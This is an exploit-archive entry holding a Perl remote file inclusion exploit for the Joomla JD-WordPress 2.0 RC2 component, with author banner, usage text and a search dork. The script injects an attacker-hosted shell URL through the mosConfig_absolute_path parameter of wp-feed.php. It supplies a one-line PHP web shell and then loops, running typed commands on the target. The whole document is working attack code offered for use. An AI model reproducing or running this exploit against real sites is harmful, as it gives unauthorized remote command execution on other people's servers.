Joomla JD-WordPress 2.0 RC2 remote file icnlusion

2009-10-19T00:00:00
ID 1337DAY-ID-9928
Type zdt
Reporter Don Tukulesto
Modified 2009-10-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================
Joomla JD-WordPress 2.0 RC2 remote file icnlusion
=================================================

#!/usr/bin/perl
 
#####
# [+] Author    : Don Tukulesto 
# [+] Date  : October 20, 2009
# [+] Homepage  : http://www.indonesiancoder.com
# [+] Vendor    : www.joomladeveloping.org
# [+] version   : 2.0 RC2
# [+] Method    : Remote File Inclusion
# [+] Dork  : "Kill-9"+"IndonesianCoder"
# [+] Location  : INDONESIA
# [~] How To    :
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
use HTTP::Request;
use LWP::UserAgent;
$Tux = $ARGV[0];
$Pathloader = $ARGV[1];
$Contrex = $ARGV[2];
if($Tux!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()}
head();
sub head()
 {
 print "[o]============================================================================[o]\r\n";
 print " |      Joomla JD-WordPress Vulnerability File Inclusion        |\r\n";
 print "[o]============================================================================[o]\r\n";
 }
while()
{
      print "[w00t] \$";
while(<STDIN>)
      {
              $kaMtiEz=$_;
              chomp($kaMtiEz);
$arianom = LWP::UserAgent->new() or die;
$tiw0L = HTTP::Request->new(GET =>$Tux.'components/com_jd-wp/wp-feed.php?mosConfig_absolute_path='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n";
$abah_benu = $arianom->request($tiw0L);
$tukulesto = $abah_benu->content;
$tukulesto =~ tr/[\n]/[�]/;
if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";}
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)
      {print "\nCann't Connect to cmd Host or Invalid Command\n";exit}
elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($tukulesto =~ /(.*)/)
{
      $finreturn = $1;
      $finreturn=~ tr/[�]/[\n]/;
      print "\r\n$finreturn\n\r";
      last;
}
else {print "[w00t] \$";}}}last;
sub usage()
 {
 head();
 print " | Usage:  perl tux.pl <target> <weapon url> <cmd>                              |\r\n";
 print " | <Site> - Full path to execute ex: http://127.0.0.1/path/                     |\r\n";
 print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt    |\r\n";
 print " | <cmd> - Command variable used in php shell                                   |\r\n";
 print "[o]============================================================================[o]\r\n";
 exit();
 }



#  0day.today [2018-02-10]  #